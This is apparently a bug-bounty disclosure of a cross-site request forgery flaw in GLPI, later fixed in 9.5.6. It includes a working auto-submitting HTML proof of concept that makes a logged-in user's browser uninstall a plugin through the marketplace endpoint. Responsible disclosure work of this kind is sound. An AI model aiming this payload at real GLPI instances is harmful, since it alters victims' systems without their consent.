Cross-Site Request Forgery (CSRF) in glpi-project/glpi

Valid

Reported on

Sep 10th 2021

✍️ Description

Hello dear glpi team I found one more CSRF vulnerability.

🕵️‍♂️ Proof of Concept

1.fisrt user already should be logged in In Firefox or safari.

2.Open the PoC.html and click on submit button ( Also it can be auto-submit)

3.Here pdf plugin will be uninstalled after clicking on submit button on PoC.html file.

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://nocompany.with7.glpi-network.cloud/ajax/marketplace.php">
      <input type="hidden" name="action" value="uninstall&#95;plugin" />
      <input type="hidden" name="key" value="pdf" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

We have contacted a member of the glpi-project/glpi team and are waiting to hear back 2 years ago

A glpi-project/glpi maintainer validated this vulnerability 2 years ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

François Legastelois marked this as fixed in 9.5.6 with commit 93750e a year ago

François Legastelois has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation